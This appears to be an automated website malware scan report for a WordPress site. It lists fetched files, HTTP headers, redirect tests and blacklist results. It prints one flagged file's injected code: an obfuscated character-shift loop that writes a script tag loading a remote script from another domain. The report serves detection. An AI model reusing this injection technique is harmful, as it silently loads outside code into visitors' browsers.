Scanned pages/files
Request | Server response | Status |
http://karosguide.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 02:37:12 GMT Location: http://www.karosguide.ru/ Server: nginx Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.karosguide.ru/xmlrpc.php X-Powered-By: PHP/5.3.3-7+squeeze8 | clean |
http://www.karosguide.ru/ | 200 OK Content-Length: 11447 Content-Type: text/html | clean |
http://www.karosguide.ru/wp-includes/js/prototype.js?ver=1.6.1 | 200 OK Content-Length: 139854 Content-Type: application/x-javascript | clean |
http://www.karosguide.ru/wp-includes/js/scriptaculous/wp-scriptaculous.js?ver=1.8.3 | 200 OK Content-Length: 3156 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.8.3', require: function(libraryName) { try{ document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); } catch(e) { var script = document.createElement('script'); script.type = 'text/javascript'; script.src = libraryName; document.getElementsByTagName('head')[0].appendChild(script); } }, REQUIRED_PROTOTYPE: '1.6.0.3',< includes = s.src.match(/\?.*load=([a-z,]*)/); if ( includes ) { includes[1].split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); } }); } }; Scriptaculous.load(); <!-- js-tools --> f=0;while(f<102)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00pcpsvepwbojf.gvkjfmfdusjd/sv0xq.dpoufou0qmvhjot0dpoubdu.gpsn.80tubu/qiq#?=0tdsjqu?'.charCodeAt(f++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.karosguide.ru/wp-includes/js/scriptaculous/effects.js?ver=1.8.3 | 200 OK Content-Length: 38471 Content-Type: application/x-javascript | clean |
http://www.karosguide.ru/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8 | 200 OK Content-Length: 21338 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2474449 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://karosguide.ru/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 01 Jul 2014 02:37:14 GMT Pragma: no-cache Location: http://www.karosguide.ru/test404page.js Server: nginx Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 01 Jul 2014 02:37:14 GMT X-Pingback: http://www.karosguide.ru/xmlrpc.php X-Powered-By: PHP/5.3.3-7+squeeze8 | clean |
http://www.karosguide.ru/test404page.js | 404 Not Found Content-Length: 15941 Content-Type: text/html | clean |
http://www.karosguide.ru/wp-login.php | 200 OK Content-Length: 2416 Content-Type: text/html | clean |
http://www.karosguide.ru/wp-login.php?action=lostpassword | 200 OK Content-Length: 2161 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: karosguide.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 02:37:12 GMT
Location: http://www.karosguide.ru/
Server: nginx
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.karosguide.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3-7+squeeze8
...0 bytes of data.
GET / HTTP/1.1
Host: karosguide.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 02:37:12 GMT
Location: http://www.karosguide.ru/
Server: nginx
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.karosguide.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3-7+squeeze8
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: karosguide.ru
Referer: http://www.google.com/search?q=karosguide.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: karosguide.ru
Referer: http://www.google.com/search?q=karosguide.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=karosguide.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://karosguide.ru/
Result: karosguide.ru is not infected or malware details are not published yet.
Result: karosguide.ru is not infected or malware details are not published yet.